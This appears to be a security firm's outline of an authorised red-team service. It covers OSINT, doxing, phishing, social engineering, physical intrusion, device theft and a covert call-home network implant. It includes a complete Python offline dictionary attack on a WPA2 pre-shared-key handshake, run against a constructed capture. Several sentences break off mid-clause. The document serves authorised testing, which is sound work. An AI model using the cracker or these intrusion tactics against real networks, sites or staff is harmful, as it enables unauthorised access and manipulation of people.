The aim of this document is to provide an outline of the approach and testing
methods that Encription Limited would be authorised to conduct whilst providing our
THINK testing Service.
The approach will be progressive, from a completely passive engagement to full
exploitation of systems and personnel (if agreed), and includes:
- Open Source Intelligence Gathering.
- Phishing and Social Engineering Attacks against agreed targets.
- Perimeter and Internal Surveillance and attacks.
- WiFi cracking.
- Acquiring Assets and IPR.
- Application Reverse Engineering.
Prior to commencement of the service a scoping meeting will be held with the Client
to agree what is in scope and what is out of scope. The level of invasiveness and
disruption that is acceptable will also be agreed. Similar scoping meetings will be held
throughout the project to agree or refine the approach and testing going forward.
The suggested timescales can be extended so that they capture more targets, or
reduced if it is deemed that fewer targets, or exercises, need to be in scope in order
to identify and understand the threats. It may also be prudent to split the exercises
into logical stages, and not proceed to the next stage until the results from the
previous stage have been evaluated, as this may affect the on-going targets and
The exercise will last over a three to six month elapsed period dependent upon
which elements are in scope, thus reflecting a true attack, where time is on the
attacker’s side. The Drop Box test for instance would be an elapsed time of 6
THreat INtelligence and Knowledge (THINK = KNOWLEDGE)
The Encription Limited THINK service provides a unique and ‘real world’ approach to assessing the
security of your organisation. The cyber threats posed to an organisation come from multiple
sources. Nation states, criminal gangs, political activists and recreational hackers are just some of
the threats that modern companies face today. Despite their different motives, all of these threat
actors have one advantage in common. Time.
A penetration test will ordinarily be conducted within a rigid time window with the full knowledge of the
IT staff and administrators. A THINK team test typically occurs over a protracted period of time.
There are many reasons for this. Primarily, it gives the testers time to observe the targets
and then to choose the moments when attacks would be most effective, just as a
malicious attacker would. It also gives us the opportunity to attempt multiple low-scale assaults
to gain an understanding of the nature of the protections in place, and then to develop more robust
and effective attacks.
The THINK team may trigger active controls and countermeasures within a given operational
environment, providing a usable metric on how effective your internal processes and controls are, as
well as quantifying the level of functional defences in place.
Simulated attacks may be delivered in multiple formats. They may be electronic, against your internet
facing defences, social vectors against your staff or even physical assessments against your
- Mimics the activity of a malicious attacker far more accurately than a narrowly scoped
penetration test can.
- Assessment tactics will be developed over a period of observation of the Client’s
organisation, enabling the test team to fully tailor its activity.
- Will reveal to an organisation the true extent of their defences and will take into account the
security culture and readiness of the organisation as a whole.
After using the THINK Service the client should have a full understanding of their organisation’s risk
profile against a cyber or internal attack, and be able to put effective security actions and an on-going plan in
place, thus making the client more secure.
- OSINT (Open Source Intelligence) – Enumerating as much publicly or freely available online
information as possible that is associated with the Client’s digital footprint.
- Doxing – the art of finding as much information as possible about an individual, thus allowing
for further avenues of exploitation, such as phishing and targeted social engineering.
- Disgruntled and targeted employees – from a list (including email addresses) of employees provided
by THE CLIENT, Encription will attempt to engage and exploit the individuals to reveal
confidential information about THE CLIENT. The targets (probably 30) should range from Director
level down to clerical staff.
- External infrastructure assessment – The external facing infrastructure of the client will be
assessed from the viewpoint of what an attacker would see. It will then be exploited where
possible. DoS attacks could be attempted; however, this would need to be explicitly agreed
upon by the client. To ensure minimal disruption to live services, a time window and attack
vector would need to be agreed in advance.
- VPN testing – if employees connect externally to the internal network, attempts can be
made to intercept traffic and to assess the strength of the cryptography used by the secure tunnelling method.
- Client side attacks – Internal and external –
Client side attacks require user interaction, such as enticing a user to click a link, open a
document, or otherwise visit a malicious website. This can also be achieved with purposely
dropped USB drives and CDs that allow for remote access to a victim machine that opens the
- Tech Support Attack – Particular attention will be given to the Technical support function in
an attempt to obtain confidential information which may be used in an attack.
- Cracking WiFi – through offline brute-force or dictionary attacks, an attempt can be made to recover the
wireless key (pre-shared key) of an AP that is used on site. This is done by capturing the four-way handshake
between a device and the AP; the capture is then run through powerful GPUs to attempt to
recover the key. This applies to pre-shared-key networks; enterprise (802.1X) networks need a different approach.
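The offline part of the WiFi cracking exercise above, as an added example written for this page (it is not Encription’s tooling or any real capture): the handshake parameters (SSID, AP and station MACs, the two nonces and an EAPOL-Key message 2) are constructed inline from a known passphrase to stand in for a real capture, and the dictionary loop then recovers that passphrase by recomputing the WPA2 MIC for each candidate. The candidate loop is what GPU crackers accelerate; here it runs with the standard library only.

```python
import hashlib
import hmac
import struct

# Byte offsets inside an EAPOL-Key frame: 4-byte EAPOL header, then descriptor
# type(1) key-info(2) key-length(2) replay-counter(8) nonce(32) IV(16) RSC(8) ID(8) MIC(16).
KEY_INFO_OFFSET = 5
MIC_OFFSET = 81
MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The 4096 rounds are the per-candidate cost that GPUs are used to pay in bulk."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512 over the two MACs and two nonces seen in the handshake."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b"".join(hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]  # the first 16 bytes are the KCK that keys the MIC


def compute_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed. The key-descriptor
    version in Key Info selects HMAC-MD5 (WPA/TKIP) or HMAC-SHA1 (WPA2/CCMP)."""
    version = struct.unpack(">H", eapol_frame[KEY_INFO_OFFSET:KEY_INFO_OFFSET + 2])[0] & 0x7
    if version == 1:
        digest = hashlib.md5
    elif version == 2:
        digest = hashlib.sha1
    else:
        raise ValueError("unsupported key descriptor version %d" % version)
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol_frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def crack_psk(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame):
    """Offline dictionary attack: the candidate whose KCK reproduces the captured MIC is the PSK."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(compute_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * MIC_LEN) -> bytes:
    """Constructed EAPOL-Key message 2 (Key Info 0x010a: pairwise, MIC bit set, version 2).
    Stands in for the frame a real capture would supply."""
    body = (b"\x02" + struct.pack(">HH", 0x010a, 0) + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + struct.pack(">H", 0))
    return b"\x02\x03" + struct.pack(">H", len(body)) + body


# --- constructed handshake (assumed values, not from any real network) ---
SSID = "CorpNet-Guest"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
_TRUE_PSK = "Summer2019!"  # used only to fabricate the capture; the attack never reads it
_kck = derive_ptk(derive_pmk(_TRUE_PSK, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
CAPTURED_FRAME = build_msg2(SNONCE, compute_mic(_kck, build_msg2(SNONCE)))
WORDLIST = ["password", "Welcome1", "Summer2019!", "letmein"]

if __name__ == "__main__":
    print("recovered PSK:", crack_psk(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED_FRAME))
```

Everything the attacker needs (SSID, both MACs, both nonces and the MIC) is sent in the clear during the handshake, which is why a single captured exchange is enough and why the only real defence for a PSK network is passphrase strength.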
ON SITE ATTACKS/TESTING
- Physical access – The entire physical access of agreed offices and site locations can be
reviewed by attempting to gain unauthorised access. This can be done by tailgating, cloning
access cards or exploiting weak security measures. Authorised access methods can also be
tested by attempting to arrange for testers under the guise of a fake persona, for example
an air conditioning worker, to be granted access to a building. Once on site,
further exercises can take place (see below).
- Server room access – once on site by any of the previously mentioned methods, testers
can attempt to gain access to the server room and look for further potential vulnerabilities.
- Documents access – documents are often left unsecured. A tester could attempt to
gain access to any of these documents that may reveal sensitive information. This exercise
can be carried out during and outside working hours.
- Obtaining network access – if testers can gain access to the internal network, by obtaining
an address via DHCP or by assigning a static IP, they can begin network vulnerability assessments.
Physical access would first need to be obtained.
- Internal network exploitation – if testers are able to gain access to the internal network,
they can begin to exploit known vulnerabilities that may be discovered during the vulnerability
assessment phase. This could include internal network client side attacks, as well as phishing
campaigns against staff. Proof of concept can be provided by leaving a “Calling Card” and
- Internal pen test – An agreed upon scope of internal testing can be arranged to allow for a
full internal penetration test from a black or white box perspective.
- Obtaining a device – This can be achieved by actually stealing a device (see below) or by
the client providing a device as though it had been stolen. This will allow for exploitation of
applications on the device, as well as revealing sensitive company information that may be
stored on the device.
- Hardware security – assessing the possibility of removing the client hardware from site will
allow for a true representation of what confidential information may be lost, if for example an
employee leaves a laptop, phone, etc. on a train.
- Obtaining app source code – If the source code of an application written by the client can
be obtained, this could highlight the possibility of a competitor acquiring the same information
and using it for their own monetary gain. This could be attempted once on-site.
- Social engineering of staff – gaining sensitive information from employees, such as
domain credentials, WiFi access codes and typical company security policies, will allow for
- Dropbox left on site – small, credit-card-sized PCs now have enough processing power to
intercept and retransmit data from an internal network over an SSH tunnel. This is achieved
by placing a “Dropbox” on the network; it then monitors traffic and calls home to an
Encription secure server, allowing for remote traffic monitoring. These devices are discreet
and are designed to be hidden behind tower PCs and other typical office furniture.
- Tiger – Tiger (ransom/coercion style) approaches are significant in the methods employed, as real-
time ‘shock and awe’ is needed; they cannot be approached faint-heartedly.
These scenarios provide real time, real life feedback in relation to how a client and company
would respond to a real time security threat.